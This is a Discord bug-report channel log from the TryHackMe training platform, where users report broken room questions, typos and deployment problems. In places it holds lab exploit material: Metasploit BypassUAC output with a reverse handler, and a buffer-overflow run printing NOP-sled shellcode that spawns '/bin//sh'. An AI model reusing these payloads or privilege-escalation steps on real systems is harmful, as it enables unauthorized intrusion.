#site-bugs
Just rebooting (battery has died on said laptop, just moved downstairs).
I have an old install of Kali on another VM.
What updates have you done? I used to be a web dev
Its my obfuscation methods
Hmm
I can revert it I guess
I just need to know where its breaking
So on the console it will kinda say
Whats causing the browser to break
Best command to run for that info?
Its in your browser console
Right click, click inspect
Then there is a tab called "Console"
Hahaa, ohh that console 🤪
Just loading the VM back up
It's been a long day at work
Yeah no problem, just out having a cig then I can be around to test as much as you need
awesome thanks
Will me connecting to the vpn help in any way from your end?
no
Shift F5
Clear your cache and try again
Load that file
Just go to it in your browser
And try come back again
Less errors but still spinning
Just taken my dinner out of the oven, I'll be more on it properly in ten
Ok ty
Small typo, likely missing a word
majority of top 10 users by scoreboard of https://tryhackme.com/room/bpsplunk haven't answered #2.17. is the question too elusive?
TryHackMe is a platform for learning and teaching cyber security.
I hope not haha
I put that question in there as one of the less technical items, it's just not super obvious from the help menu
i'm thinking something's got to be up with that based on stats from the scoreboard. numerous people have answered every question but that one
looks like a few question on the room chat including the most recent are related to that question as well
I can tell you the question is worded almost nearly as you would find it in a splunk textbook as I reviewed one of my books when making that room
The hint I'll provide is: p**** t****
would it help to add a hint to that question (within the webUI)?
Done
thanks! now to watch the numbers on the scoreboard and see if that did the trick
Haha yeah
small typo in the upload page: We are uploading your file. Please be patient, manually refreshing this page will destory <<[typo here] all progress..
God, I gotta find a XSS on THM xD.
Realistically I need to talk to Skidy about a web app for it
Rather a pentest on the site
^
xss room has err_connection_timed_out errors for me fairly consistently. esp reproducible under the Filter Evasion section, I can't "submit" new attempts more than 2-3x in a row without the room timing out. happens across ff/chrome on diff computers and ISPs. also across multiple instances of the deployed room across 3 days.
a second item to note is that under tasks 8.3 and 8.4, i've got several variations that meet the objective of displaying an alert with "Hello" but don't yield a flag afterwards. happy to give examples in a DM if anyone wants to add those to the corpus of accepted inputs for future users
Hey, yeah the XSS room has problems that I need to fix when I get time.
Sorry for that
Vulnversity Task 3 about gobuster does not list the subcommand dir: 'gobuster -e -u http://<ip>:3333 -w <word list location'
Yes I figured my way around it I just wanted to submit it so it could be fixed. Thank you both @tawdry totem @frosty cape
I only have a few minutes at a time so im still on vulnversity is Task 4 #3 written correctly? I found the area but to me doesn't seem as described
"Now make sure BurpSuite is configured to intercept all your browser traffic. Upload a file, once this request is captured, send it to the Intruder. Click on "Payloads" and select the "Sniper" attack type.
Click the "Positions" tab now, find the filename and "Add §" to the extension. It should look like so"
I think it should be Intruder > Positions > Attack Type: Sniper ... Because Payloads tab is different.
The Linux CTF two of them u cant do
Which ones @slow sphinx ?
@frosty cape
could you update the room, playing with my OCD ngl aha that ive done it but its saying I havent ah a
Flag 26 and 27 are solvable ^^
Currently no one able to solve flag 25, Imma trying it
@tawdry totem
Oh yes?
I am try to find Flag 26 or 27 in Linux Challenge
@tawdry totem I am almost certain that I stumbled across flag26 or flag27 while I was looking for another flag.
Alright, will pm you now. Plus, this is not the correct channel. This is a bug reporting channel.
sorry man
Guess its been discussed already. But the "add 1 hour" option is not working (at least for me)
What do you mean?
Does nothing happen?
Just tested it, seems to work for me
What happens when you try to extend?
extended with around 10mins before the machine expired
and even though i extended it, it closed
yeah, there was no problem form e
for me, spawned a new one
oh right? Has anyone had this problem?
When you extended did it say the expire time was in 1 hour?
Yup
Spelling error (https://tryhackme.com/badges)
Fixed thanks for letting me know
https://tryhackme.com/room/ccradare2 Issue with task 2, question 4
Answer should be -- rather than -
@covert kernel
To explain a little more, all the other answers needed the - prefix so this shouldn't be an exception
Ayy, glad I could help. Otherwise, really enjoying that radare tutorial @covert kernel
:D
seeing an issue where I can't deploy VMs in new rooms
steps to reproduce:
- join room
- click "deploy"
a. see "Starting your machine.. please wait!" banner
b. nothing ever happens - If I refresh browser window, no IP info is available and the "Deploy" button is green again for me to select
also can't seem to terminate my VM from the heartbleed room. perhaps the two issues are related?
I'm having the same issue with deploying the PowerShell VM
Hey. Just noticed something not important.
Perfect thank you. I won't blame my incompetence yet
bruhh
Our infrastructure providers are experiencing a temporary issue, for now you will be unable to deploy machines. We apologise for any inconvenience, feel free to reach out to us!
For now, don't forget you can do any of the machines where you don't have to deploy a machine or any of the rooms where the VM is publicly available (i.e. any of my rooms where the download of the vm is available on https://darkstar7471.com/downloads/ )
You are welcome, cool :)
A typo. Nothing serious! :)
https://tryhackme.com/room/juiceshop TASK4; HINT
https://tryhackme.com/room/vulnversity I think the flag -u is wrong for gobuster in the version that's in the kali repos at least
Unknown shortform flag
in fact, the whole command given won't work
gobuster now needs you to specify what you're trying to bruteforce
Ok, you can specify -u if you specify the type of scan
So you need gobuster dir -u <target> -w <wordlist>
Latest version here
Also, the answer for what extension is blocked
txt files are blocked, with the message that that extension is not allowed
So is zip
And png
Everything so far reports extension not allowed
what common extension
Skip that question and come back to it
It will make more sense after maybe
They're all common extensions
Oh it wanted a . prefix
Well, the gobuster point still stands
Bugged time since posting? Was at 2m ago last night when I checked this last. Not sure if this is known yet
I have only completed the first 10 tasks of the c4ptur3-th3-fl4g room but it seems to have bugged and decided I've finished all of it
The other sections aren't showing the tasks. I've replicated this in a few different browsers
@mortal root try leaving the room and rejoin quickly, see if that resyncs the tasks
It's likely due to the age of the room that it's glitching out
weird, that fixed it. cheers @rugged ermine
yup! Glad that worked and that I could help haha @mortal root
By the way, what level are you right now @mortal root ?
I can get your tags updated in the discord
0x9 - I've been so busy finishing uni/interning that I've fallen far from grace :p
You can also DM me any certs you have and I'll get you tagged accordingly
so now I have a little bit more time I'm trying to regain ground
awesome thanks
@rugged ermine seems to be a recurring issue, just joined another (much newer) room and as soon as I joined, same issue
no
oh wait
i had the exact same issue
i just thought none of those had questions
timezones seem off for me, can't see anywhere on my profile where I could change it
for reference I'm in the UK now (10:50PM)
I am too in the UK
No issues for me
It uses your local clock
So if you're using a VM, is that VM's time zone set to GMT?
Can you change it to UK format?
Just to see if that fixed it
If so I will try find a solution
doesn't affect functionality anyway
What browser are you using? And whats its version number?
Yeah but is annoying for you aha
Ill get it fixed
Firefox 60.8.0esr
Finished the window bof box, nice box btw. However, I found a small bug in the description.
The EIP should be reverse due to big endian.
Took me sometime to figure it out haha.
Is that considered a bug?
In this case, kind of. This is a known bug as that page is somewhat deprecated. Realistically, for the Bug Hunter award I believe we're looking for major errors in the site overall (not to be a wet towel of the conversation)
That page realistically needs a revisiting and it does have its charm
@rugged ermine You have a typo in RP:metasploit in the Initialising section
Should be msf, not mdf
Additionally, q6 on Task 5. it asks for the full path but you need to enter it without the exploit/, which means it's not the full path
I'll add exploit on it, good catch on both of those haha
@rugged ermine Good room though, I felt like I learnt a lot because I've been avoiding msf as it makes me feel like a dirty skiddy
While a lot of people consider MSF to be easy mode, it's an essential tool for even stringing together other frameworks
The other frameworks part I should have realistically alluded to in that room but I tried to keep it mostly essentials-focused. You can pretty much throw whatever you want in the payload and get things like Cobalt Strike, PowerShell Empire, or even Silent Trinity involved. Metasploit is a framework that is stupid powerful
@rugged ermine Yeah, that's why I want to learn it. But I'd rather learn the 'real' ways alongside
This page is now out of date, as HB2 happened
Oh goodness, my team is listed on that page still lol
yeah, it's the highest scoring team
Updated locally, will be made live this evening.
Skidy with the ninja edits lol
...I just got dabbed on by Skidy..... Oh lordy
lmao
oh lordy
@spiral flame There are multiple for that and it's actually grepping for the correct answer there
Not the best screenshot but that's from the control panel
I had that mentioned to me just a bit ago, it's been retired unfortunately so I'll just change it
I'll go back and grab a screenshot
I just updated the room lol
Is the cryptofun room supposed to have more than 1 txt file for download?
for Task 1
Uhh... LanSharks2 on the 2nd place.
Hehe as it should be @earnest solar
I agree @rugged ermine
Still needing 1 more member xD
If anyone wanna join, you're welcome. Just PM me. A beginner or an experienced user, doesn't matter
https://tryhackme.com/room/xsschallenge This room has stopped existing or is private, but shows on profiles
In Fowsniff CTF Task#1.10 is In the email, who send it? Using the password from the previous question and the senders username, connect to the machine using SSH. This should say the recipients username, not sender.
In KnockKnock question 3 is looking for the wrong answer. Either the question should be reworded for the answer thats currently considered correct, or the expected answer changed to match the current question
In room Biohazard, when you obtain "crest 4" there are two hints that are described as being related to "crest 2" when in fact they're for "crest 4"
@tawdry totem that one would be for ya
In room Alfred question #1, The answer to How many ports are open is incorrect, there are double that amount of open (and responding) ports
In room Kenobi, question #2, The accepted answer to, Scan the machine with nmap, how many ports are open? is incorrect as there are 5 additional ports open. The question is assuming you're not completing a full port scan and only using nmap's default port list
I'm getting a connection error on the ninjaskills room
I'm connected to the VPN
Ignore me, now working
Yeah sorry, it takes up to 3 minutes to boot!
Isn't it should be fire away!
@spring heron thank you for the solid QC on the rooms as you go, helps us go back and catch small things ❤️
In /room/cryptochallenges Task #8 successfully decrypts but is not the accepted answer. Additionally, the given answer format of "12char 4chars, 3chars..." doesn't occur as a pattern anywhere in the decrypted text
@spring heron additionally, the XOR challenges need to be decoded from hex first
After completing the RP: Metasploit room, it doesn't seem to be showing up in my list of badges
I tried leaving and re-joining
not a huge deal, but wasn't sure if anyone else had this prob
@sturdy halo I don't think there's a badge for it
Yeah actually, I don't have that badge
Skidy can likely get this taken care of in just a short bit
cool, thanks
In a room, its not showing you have the badge, but what badge is available
I can see why it looks confusing
It looks like you're going to get the badge.
But its just showing you whats up for grabs
It will earn you that badge
@frosty cape I did the room, and didn't get the badge
oh sorry, AFTER doing the room
@delicate dragon
Ill take a look guys regarding the badges sorry
Ooooo
Its because, I added the badge a few days after the room was released
So it wouldnt have updated for you
Please DM me your username and I will add the badge to your account!
(I'm just giving you a hard time)
:p
I'm gonna implement the auto subscription role assign feature
But seriously, how did it die?
No idea, I haven't peeked at the console yet
Oh
@delicate dragon do you have a DB set up so !rank can detect who you are yet?
It's in progress, since the new feature Skidy implemented will give you a token which will help you to verify as it'll help you to change roles accordingly, as soon as you get rank there, yours will be updated here.
Might take a while since I have exam, but will be implemented this week.
Oh cool. Looking forward to it and good luck with your exam.
Thanks
In Brainstorm room i can't get a response from the deployed machine, tried resetting it several times.
In room Goldeneye Task2 question 3: Inspect port 55007, what services is configured to use this port is looking for the wrong service name than what is actually responding on that port
In room WebGramming Task 2 "Repeat" the service on port 19001 is insanely unstable and requires multiple re-deployments while interacting with the service due to crashes
Ok, giving up on WebGramming until it can be looked at. The instability isn't limited to Task2 that I mentioned earlier and affects all the tasks. You have between 1-5mins before the app crashes and stops responding for all the tasks.
@spring heron I had the same issue with GoldenEye months ago - I think it'd be good if we had a better way of tracking room issues/alerting authors
Because I know how frustrating it can be when you've already invested time into a challenge and you reach a roadblock that shouldn't exist
+1 for issue tracker
I've dropped it in #544951750801752079
Looking at the room, seems like there's been 0 completions in ~6 months, maybe in addition to issue tracking, gathering analytics about user engagement with rooms would be good
like completion times, most hinted questions etc, would help identify issues people don't report formally and help content creators improve their submissions
Also maybe a code escrow for rooms. So if a contributor is no longer active but the room needs care/feeding it could be made available for a new maintainer to take over
Hmm yeah I guess there's a weird ownership issue there, once an OVA is uploaded to THM it's no longer retrievable by room creators (correct me if I'm wrong). Also don't know if there's a particular term/condition of who owns the rooms/VMs once they are uploaded to THM
But yes, I think a good example is the "Cardboard" challenge in HackBack2. There's a known issue with broken port knocking on there, but it seems there's no way it's going to be fixed
"2. Use License
Unless explicity stated or credited, users are assumed to own the material they used to create a room." - so I guess in its current state, THM would need to have a new policy where rooms can be modified after submission with perhaps an opt-out? And then ask existing content creators if this can be applied retroactively
hmm, yeah
In room HackBack 2019, Task 4 (Jurassic Park) it doesn't appear that Flag4 is being generated (unless the reference to it is a red herring). Same within the Jurassic Park room as well obviously.
I beat on flag four for literal months
|| it's a red herring, there is no flag four. I have the actual flag four hash that I had to ask for originally, let me know if you want it ||
In room Intro to x86-64, Task 6:CrackMe, the logic in the binary is flawed and accepts multiple values as the correct password, as long as the first 3 chars are correct
The question is What is the password? and the answer format was ***.*.*.*
Task7 has a similar issue, the binary accepts a single character and responds that its the correct password
@spiral flame I read back thru the room and dont see where it says what are the first 3 chars of the correct password, nor in the prompts for either binary, enter your password and Please enter password
Might be thinking of a different RE course on thm then
Error in Windows BOF.
```
This tool is called pattern_offset.rb
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -h
```
pattern_offset != pattern_create.rb
Bug in powershell. Get-Command | measure returns 7935. Deskel's writeup says 7935. Submission doesn't accept that as answer
Soooo
UltraTech Task2 Question5
the submit button doesn't work
pressing submit and there is no "Correct answer" nor "Wrong answer" popping
tried with UBlock disabled too
it's odd because the other worked. Tried in a different room and those worked too
I managed that the other day... Interesting
@earnest solar Ah you're right, I will look into this later this week
All the tasks in WildFireCTF appear to be broken
What task and question number @vocal raptor ?
@sly raft for windows BoF, task 3 question 6. the tool we use does not match the name of the command it says to run. For powershell, task 3 question 3
You're correct, it should be vmdk
(this is on the landing page when you're not logged in)
In room Toolbox: Vim Task3, Quest 6 the accepted answer isn't the correct one
On the THM Blog there is a write-up for Zeus, but the link leads to "Owner has made this room private"
@rugged ermine I think that your room?
I think we made it private as we're seeking permission from the original VM creator.
@spiral flame Thanks, updated! The change will be made live this evening.
In "HackBack 2019" Task 14, Quest 1: there is nothing in the provided pcap that would be an indicator of the accepted answer, and is more of a guess based on the description of the task.
In the room ICE is the accepted answer for the CVE correct?
Yes, at least for me
I got a 2004 one
And that's what the msfmodule lists as the CVE that it's using
But thats not the correct one based on question #1
But it is the correct answer based on what you're actually doing
The exploit you pop
the 2014 CVE isnt RCE nor is it a cvss score of 10
There might be 2 CVE's for the same vuln
I remember Dark complaining about when that happens a little bit ago
I mean I had CVE-2004-****
@tribal knoll nope, two different CVEs one is buffer overflow with score of 7.5 from 2004. The one described in question #1 is RCE from 2001 and had a score of 10
I mean they're right, the only 10.0 score cve is the 2001 one
@rugged ermine So yeah, this is actually an issue
nvm just realised this is bugs and not room help smh
Could switch the number 10 to "Rated as critical"
but you'd also have to change the accepted answer for #1 since the 2004 CVE isnt RCE
Guys hate to tell ya, I know it's a room intended for learning but you've just dropped the answers in here
This is bugs
I thought it was room-help at first tbh
@spiral flame its a BO that can lead to RCE
Deleted my spoilers
It gives you RCE, it's classified as Execute Code,Overflow
I know it's bugs. But regardless you have posted the cve
Which in turn spoils the question it asks
It's normal to spoil answers in bugs
Very normal, scrolling back
You kind of have to, if your answer is right and the accepted answer isn't
Thats RCE via Buffer overflow. Straight-up RCE would be something like Vulnerability Type(s) Execute Code
The results of exploiting a vuln isnt what dictates the vuln type. A BO can also lead to DoS, but I'll agree to disagree.
You legit both just said the same thing but reworded nvm I can't read ignore me
I should double read stuff before I open my mouth
Has anyone had success with priv escal on ICE?
I did when it was RP metasploit
Multiple attempts, with multiple redeployments , all failed so far
MSF versions:
Framework: 5.0.61-dev-
Console : 5.0.61-dev-
From Ubuntu 19.0.4
Can an admin check to make sure msdefender isnt eating them?
Pretty strange, seeing as it worked on rp metasploit and this is the same VM afaik
I can assure you that box doesn't have defender
all of my testing was done using the THM-hosted version of the box and it all does work
welp, as the saying goes... 64th times a charm. Finally popped second session
Speaking directly as the developer, Ice is my most thoroughly tested room. Some of the items in it can take a few attempts but that's just pentesting in general there
@rugged ermine Did you see the chatter early about quest #1 and 2 under task 3?
I can check on that now
I did not previously
Resolved, it was a misalignment specifically from myself looking at the CVE's associated with Icecast. If you check https://www.cvedetails.com you'll find Icecast is plagued with CVE's and I had misaligned that between the two sources I had looked at.
CVEdetails.com is a free CVE security vulnerability database/information source. You can view CVE vulnerability details, exploits, references, metasploit modules, full list of vulnerable products and cvss score reports and vulnerability trends over time
I've adjusted the wording on the vulnerability type question as well. While I consider this to be RCE, I'm using the wording now on CVE Details to avoid any confusion
Nice work @rugged ermine, the rest of the completed as expected. The badge is fitting given the season
Thank you
Thank you guys as always for the fine-grained checks on the room, helps me maintain them and provide clarity
@rugged ermine remember to put the VM files on your site asw
^Yup yup, I have to compress it but I'm in the process of doing that today
I have to update my rooms to have links to the download page
tyvm for the reminder of course
Any idea why priv esc is escaping me?
What architecture is your shell?
I tried both x86 and x64, x64 wouldn't give me a shell
For me I'm assuming most of it was related to my migrating my CTF workstation build to 19.04 and working out the kinks
the suggestion engine doesn't work super well on x64
I got the exploit, just would never give me a session
Good to know though since other people will undoubtedly hit similar issues
[*] Exploit complete, but no session was created.
do you have your LHOST set correctly? I had that happen a bunch
one other thing to keep in mind is that LHOST isnt global, unless you specifically set it...
it might not be 'catching' it
hmm
I can also give you the local version of the box in a short bit, that might help
(could I also get a rank up real quick, 0xD now)
done!
|| [*] Started reverse TCP handler on 10.10.14.2:9001
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Cleaning up registry keys ...
[*] Exploit completed, but no session was created. ||
Is 10.10.14.2 your TUN0 ip? Mine is always in the 10.8.8. range.
Uhhhh
^I think your catcher and pitcher might be flipped
That's HTB isn't it
oihuj;aerg
welcome to Friday!
xD hey at least we got it
@rugged ermine So if the privesc doesn't work, I have to redeploy the machine?
My biggest pet peeve right now is MSF 5 not catching ctrl + z properly anymore
Sometimes, it will work most of the time and a lot of times you can just rerun the exploit @spiral flame
@spiral flame double check lhost, its not global by default
Ok
In HackBack 2019 Task12 question 8. What site did the user go to? Answer with the sites FQDN the accepted answer format isn't the FQDN that the user accessed. Edited for clarity
And same task question9, Look at all downloads in the pcap, who did this user download a photo of? There are only two downloads in the pcap and both are a 1x1 gif. Or is there a deeper puzzle here that I'm overlooking?
there are quite a few that appear unsolvable in that room due to various issues, I have a running list that I'll post once I've done as much as I can
@spring heron yep, and the same with hackback2
Would you guys be interested in beta testing? This would be for my content specifically (primer rooms, etc)
@rugged ermine yes for sure!
I would be up for that too
I'll make a chat in just a bit for beta testing, I'll invite y'all
gotcha!
@rugged ermine
doing the mrrobot room and when you get to wordpress it kinda shits the bed
pages taking like 5+ mins to load
sometimes not even loading
me and the bois have uploaded a reverse shell, but we can't even load the page to trigger it
#room-help would be best here ❤️
I didn't have this issue tbh
@hollow arch you have a typo on the main page of djinn
on the webserver page
let's see how good your are
Also, I think it actually asks 1001 maths questions
Python loop goes till 1001 meaning it will stop on 1000
https://tryhackme.com/room/kali can't complete the 2nd (duplicated?) question REEEEE
@hollow arch my script loop counts 0-1000 inclusive so there's 1001
@neon zealot This is so weird.
Erm, when you're online again this evening please let me know and I can check what the issue might be
@frosty cape UltraTech still doesn't validate task 2 question 5 answer
The question about number of REST routes?
Yes
Hmm, validated for me. I just dont recall which day I solved it on to compare results. Was in the last 20d tho
Tried validating it about 1 week ago
It validated for me
I just reminded Skidy to look into it xD
I tried different browsers
I don't get that pop up
Which says its wrong or right
Chrome on MacOS here
@hollow arch @spiral flame yeah, counting the one that is sent with the initial connection there are 1001 operations
oh
as far as I remember I was running the loop till 1001 so I thought it might be 1000
999 - b" (3, '-', 1)\n>"
1000 - b" (2, '+', 8)\n>"
1001 - b" (7, '*', 2)\n>"
[*] Switching to interactive mode
Not sure whether to put it here or feedback but it says "Horay!" when you deploy your machine, should it be "Hooray!" or do both work?
A deviation of 'hooray' The phrase may have originated from Pokey the Penguin.
lol
Where did you see that @neon zealot ?
In rooms?
If so, I have just updated it. The change will go live after lunchtime today.
Hurray or hurrah
Still can't seem to pass https://tryhackme.com/room/kali
The question seems to have duplicated for me, and when I click "completed" it says it's the wrong answer
It's duplicated that question
Wondering why it wont let me answer it though
Leave and re enter the room
tried, still there sadly
Interesting. It's happened to 2 different people on 2 different rooms recently
I guess for now I'll leave the room cause it's messing up my "rooms in/rooms complete" ratio
Ahhh, I thought I had fixed the duplication bug
When did that start appearing @neon zealot
X-posting from #room-help
Can an admin check the network/firewall setting for when WebGramming is deployed? When it first deploys its reachable from outside THM VPN, then becomes available only from VPN, then a few minutes later stops responding altogether, including pings
I noticed it yesterday
Just checked again today and it's there
maybe it only fixes for people who don't have any progress in the room?
In room Intro to Windows BoF Task2 Question 5, What is the name of the Administrator account?
Should that be What is the name on the admin account vs "of"
No, the grammar works fine as it is
I'd argue "on the admin account" is less correct
But the name of the admin account is Administrator, no?
I don't know without doing the room, but it varies by windows install
Windows account have a "Name" like Administrator and a "Full Name' like Jim Smith.
The accepted answer is looking for the value of the "Full Name" of the admin account
Then that might be a better way of asking the question
Full Name, rather than username
Also on the same room Task3 Question 1 How many ports are open on the box? The accepted answer is for the number of ports detected by a default scan of nmap and not that actual number of responding ports.
@frosty cape space required!
Yeah fixing all spacing issues on that page
I am re-reading it
Ah! apologies i made you re read it!
Nah needed to be updated, so thank you!
Hey @frosty cape I think I need to dm you about something
It might be chrome being dumb actually
Nvm, 99% sure it is.
(sorry)
X-Posting
Not sure if this falls under #room-help or #site-bugs but the subscription-only room Buffer Overflows is brutal
The description is Learn how to get started with basic Buffer Overflows! but the last two challenges would fall in the expert category due to a disassembler not being installed in the deployed room
I've spent 5hrs this morning attempting it by utilizing strace to determine some of the address locations and can get to the point of controlling RIP, but even with a NOP sled of 60+ its a guessing game to determine the stack pointer in order to hit the sled
Additionally, I tried compiling GDB but it doesn't appear as the redhat dev toolkit is installed either since the current compiler doesnt support C++11 (I also believe the toolkit installs GDB)
About 6hrs in I finally have code execution, will work on swapping in shellcode when I'm back from an event tonight.
Here's a program that echo's out your input
οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGοΏ½οΏ½οΏ½οΏ½
Trace/breakpoint trap
Another update... finally popped shell but the SUID doesnt appear to be functioning
Here's a program that echo's out your input
οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½οΏ½jBXοΏ½οΏ½HοΏ½RHοΏ½/bin//shWT^IοΏ½οΏ½IοΏ½οΏ½AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGοΏ½οΏ½οΏ½οΏ½
bash-4.2$ whoami
user1
Should be user2... this def isnt a beginner challenge
No worries, my mind is fried from this one so any dialog is welcome
I flush the ENV prior to exploiting so I get a consistent stack, I'll have to look into how that impacts SUID execution, I wouldnt think it would
hey @spring heron
i'm so sorry about that - I was quite sure that r2 was installed on there
uploaded the image to have r2 + gdb on there
so it should work fine
^ i disabled ASLR + Canaries when creating the challenges so the addresses should be static O.o
Thanks @sly raft, there should be a badge for getting shell using only strace for analysis.
Are the absolute links to localhost on the BluePrint website intentional?
@spring heron yes they are. You'll have to dig aaaaa liiittle deeper
omggg did you pop a shell using strace @spring heron ?
Also if you're using another program to run shellcode like gdb/strace it would use the SUID bit of those programs instead of the actual binary
Which is why you use those programs to test if the shell code works, add a bunch of NOP sleds to make it reliable, and run it using the binary
So the login page, it says username or email. I tried with my username and it didn't let me log in.
Worked with my email
I'll investigate:)
@sly raft I used strace -i ./buffer-overflow ... to aid in "brute forcing" the stack address and then ultimately popped shell with env -i ./buffer-overflow ... but it didn't retain SUID. When I'm back from traveling later tonight I'll give it another try without wiping ENV
some elements are not responsive
Ahhhh, I will update this tonight. Thanks for reporting :)
Btw I haven't tried chrome mobile, only firefox mobile
Do you have "request desktop site" on? @remote laurel
I bork
Should the button say add writeup instead?
Yeah the only thing is... the site is not really intended for mobile. Its on my to-do list, but I can't imagine anyone using the site on their phone... unless they're ub3r l33t.
Ah yeah!
Updated, will be made live tomorrow
A very large portion of the world only use mobile, while it's unlikely there are people who do use sites on mobile that aren't made for it (IE Free code camp https://www.freecodecamp.org/news/how-i-went-from-programming-with-a-feature-phone-to-working-for-an-mit-startup-40ca3be4fa0f/ ). might be a nice unique selling point. hard to imagine kali on a phone, but termux exists or they might just want to read the walkthrough rooms
Oo @vocal raptor yeah I had not considered that. Thanks! I'll make the site much more mobile friendly in the near future
Room BrainStorm Task#2 Quest#2 How many ports are open?
The accepted answer is twice the number of listening ports.
@covert kernel In your reverselfiles room, I think task 5 has a typo on the prompt. Binary would print "Good Game" not "good job"
Thanks man, I'll change it
(I might be wrong)
@rugged ermine Is joystick meant to be unbearably slow, on the terminal?
It's kinda sluggish since it's running a game server
Does it just not have enough ram or CPU?
@rugged ermine can RP nessus still be ran with nessus 8?
Yeah, there's not any major difference there between the versions
Then I'd suggest changing the "Nessus 7 Manual" to "Nessus 8 Manual"
If it needs it I can give the machine more resources
I was just thinking that haha, I need to change that room
Not yet dark!
I've been working on updating my content the past few days of course
lemme complete it first
Also probably add a warning saying "nessus can take HOURS to install once you get to the web ui, you're gonna wanna leave it for a bit"
Hey @frosty cape Heartbleed is a part of Hackback2019 (Task 7), so should the room still be private?
^ room is private because it's a full break down of the vulnerability
Ah ok
This is what the sub page looks like on mobile
Alignment seems off
Seems like the name should be above
Im just getting connection refused, multiple instances now
Where?
New christmas room
Gotta wait for the web server to start @cosmic glade
And you can't run multiple instances at the same time
Also make sure you're either VPN'd or using the THM your own kali box
I'm VPN'd, it's been minutes since server deployed
Normally the rooms come up in less than 60 seconds
is port 3000 correct?
Alright thanks, that was a while but it's finally up
@frosty cape https://tryhackme.com/room/corp VM is showing token=undefined upon deploying
pinged Skidy in particular bc I know he's looked into that same issue before. and actually, happening across rooms for me now (Kali room as well)
https://tryhackme.com/room/kali This states 30GB memory, it should really say 30GB disk
@spiral flame was that comment for me?
thinking again how discord needs threaded convos
Discord is like irc, irc has the same issues.
yes, though Slack and MS teams setting the standard w/ convo threads
For the second prompt, when doing the thing to find the fixed value, my first one was actually missing part of it. it was missing the last three characters... (Tried saying this in a way to not give out spoilers)
Is this a bug? Mine worked properly
Santa didnt keep the last 3 characters
In the Advent of Cyber Task 5 Q#2 _If you decode the cookie, what is the value of the fixed part of the cookie?_ the accepted answer will take a partial answer
Hello, i think there is a bug on "vulnversity" challenge, in Task 4 they tell us to " Try upload a few file types to the server, what common extension seems to be blocked?" so only 1 should be blocked, but it seems that they are all blocked, even if i have found the solution
Only one will be accepted rather
One of those extensions will work (hint it's the weirdest one)
Ok thanks
@frosty cape can u check the UltraTech room? i cannot submit the answer for Task #2 question #5
UltraTech is broken for the time being - I will fix it when I have a spare 30 minutes
I will be making this room private for the time being
Sorry @next anchor - I will take a look at fixing it now actually
@earnest solar Ah I understand now
Leave the room
And re-join
That will fix your problem
Question duping is getting worse
Or sample size has gone much up and people are reporting
Advent challenge VPN IP addresses login breaking on challenges is big bug
Minor time formatting bug in chat:
@frosty cape are you author of corp room? Trying to figure out who can fix the room (specifically last question logging in as admin since the admin account password expired in mid november)
@rugged ermine
Well poop, Skidy will have to catch that one with the box name
Is anyone else experiencing that issue?
nope
@neon zealot That Christmas capital is fixed
Also, I have a bunch of trouble logging in.
I reset my cookies every browser close, would this be an issue?
It says I'm using the wrong username and password, but I have an account manager... I've reset my password like 3 times thinking I just misplaced it..
Try using email rather than username @clever cloud
@clever cloud nah, username login doesn't work for me either
@frosty cape did you find a fix for that?
Going to restart OpenVPN server in 10 mins
Just uploading some code to improve the platform. Don't want it crashing again
Yeah, people are still using GoBuster
And all those requests are being routed through the VPN server
Will fragment at some point
@frosty cape I was mainly referring to the login issue. You can't log in with your username but the prompt is username/email.
Couple of people, myself included, have found that
Is the restart currently happenin'?
Yeet
Pushed
Hopefully that will stop the crash.. I'm going to eat my words I just know it
Thanks, been fixed
Also, people who make rooms can't view them if they're sub only. They can manage but not view
oh yeah, thats actually a very good point
Thats providing they dont have a sub tho right?
@frosty cape yea
Thanks, added to my list
In room https://tryhackme.com/room/xss , it says You do not need to be connected to our network to deploy and access this. but I get given a 10.10.x.x IP
why does every room link redirect to the why subscribe link?
Because it's a sub only room?
i guess that why, but you can make me like it! 😡
@frosty cape The password hash is impossible, shadow file isn't readable by this user and you don't have sudo
@sly raft Neither file is readable
DM pls
Advent of Cyber, Task 9/Day 4, Item #5 - seems broken; running the same command results in diff #s of files on different people's systems
yay
Thanks for the fix ❤️
❤️
